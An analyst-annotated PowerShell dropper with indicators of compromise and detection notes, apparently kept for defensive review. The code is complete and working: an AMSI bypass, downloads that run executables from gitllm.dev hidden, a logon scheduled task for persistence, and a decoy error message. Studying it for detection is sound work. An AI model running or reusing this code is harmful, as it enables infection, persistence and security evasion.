# --- Analyst annotation (defensive review) ---
# This is a PowerShell dropper/loader, not an administrative script. The sample
# was captured as a single collapsed line; only line breaks and comments have
# been added below, every token is as found. What the visible code does:
#   1. decodes hard-coded Base64 literals into a download host and two paths,
#   2. disables AMSI scanning in the current process by reflectively setting
#      System.Management.Automation.AmsiUtils.amsiInitFailed to $true,
#   3. downloads a file to %LOCALAPPDATA%\<guid>\<guid>.exe and starts it hidden,
#   4. downloads a second file to %APPDATA%\code and registers it as an
#      ONLOGON scheduled task (persistence),
#   5. deletes the staging directory and prints a decoy "run as administrator"
#      error so the user believes the script merely failed.
# Indicators recoverable from this sample alone (decoded from the literals below):
#   host  gitllm.dev      paths  /crypted.exe  /code
#   drop  %LOCALAPPDATA%\<32-hex>\<32-hex>.exe   %APPDATA%\code
#   task  random 32-hex name (GUID 'N' format), trigger ONLOGON
# Detection surface: PowerShell Script Block Logging (Event 4104) records the
# decoded strings even though the literals are Base64; the amsiInitFailed
# reflection pattern is widely signatured; the schtasks /Create call surfaces
# as Security Event 4698 / Task Scheduler operational logs; the WebClient
# downloads to the host above are plain HTTPS and visible to network telemetry.

# Decodes a Base64 literal to ASCII. Used only to hide strings from static
# inspection; every value it produces is fixed and listed in the header.
function dec([string]$s){[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($s))}
# Obfuscated download targets: '/crypted.exe', '/code', 'gitllm.dev'.
$path1 = dec 'L2NyeXB0ZWQuZXhl'
$path2 = dec 'L2NvZGU='
$domain = dec 'Z2l0bGxtLmRldg=='
$u1 = "https://$domain$path1"
$u2 = "https://$domain$path2"
# Random names (32 hex chars) for the staging directory, the dropped exe and the
# scheduled task, so each infection leaves different file/task names.
$r1 = [guid]::NewGuid().ToString('N')
$r2 = [guid]::NewGuid().ToString('N')
$dir = "$env:LOCALAPPDATA\$r1"
New-Item -Path $dir -ItemType Directory -Force | Out-Null
$exe = "$dir\$r1.exe"
# Second payload is written to a fixed path; this one is a stable IoC.
$code = "$env:APPDATA\code"
# AMSI bypass. The assembly and type names decode to
# 'System.Management.Automation' and 'AmsiUtils'; flipping the non-public static
# field amsiInitFailed makes AMSI report that initialisation failed, so later
# script content in this process is not scanned. Nothing outside this process
# is affected, and the literal field name is still present in the text.
$asmName = dec 'U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbg=='
$utilsName = dec 'QW1zaVV0aWxz'
$asm = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GetName().Name -eq $asmName } | Select-Object -First 1
if ($asm) {
  $type = $asm.GetType("System.Management.Automation.$utilsName")
  if ($type) {
    $flags = [Reflection.BindingFlags]::NonPublic -bor [Reflection.BindingFlags]::Static
    $field = $type.GetField('amsiInitFailed',$flags)
    if ($field) { $field.SetValue($null,$true) }
  }
}
# Download helper: up to $Try attempts, swallowing every exception, with a
# jittered $Sleep between attempts. Returns $true once the output file exists.
function d($Url, $Out, $Try=3, $Sleep=5) {
  for ($i = 0; $i -lt $Try; $i++) {
    try {
      $wc = New-Object Net.WebClient
      $wc.DownloadFile($Url, $Out)
      if (Test-Path $Out) { return $true }
    } catch {}
    Start-Sleep -Seconds ($Sleep + (Get-Random -Minimum 0 -Maximum 5))
  }
  return $false
}
# Stage 1: fetch and launch the executable with no visible window.
if (d $u1 $exe) {
  Start-Process -FilePath $exe -WindowStyle Hidden
  # Random delay before the persistence step (likely to separate the two
  # events in time; intent not stated in the sample).
  Start-Sleep -Seconds (Get-Random -Minimum 10 -Maximum 30)
  # Stage 2: fetch the second payload and register it to run at every logon
  # via a hidden, ExecutionPolicy-Bypass PowerShell invocation.
  if (d $u2 $code) {
    schtasks /Create /TN $r2 /TR "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$code`"" /SC ONLOGON /F | Out-Null
  }
} else {
  exit 1
}
# Anti-forensics: remove the staging directory. Because the exe was just
# started, the delete may fail while it is running; errors are suppressed, so
# the dropped exe can still be found on disk during response.
Remove-Item $dir -Recurse -Force -ErrorAction SilentlyContinue
# Decoy message: the script has already succeeded at this point; this only
# nudges the victim into re-running it elevated.
Write-Host "Initialization failed. Please run PowerShell as administrator." -ForegroundColor Red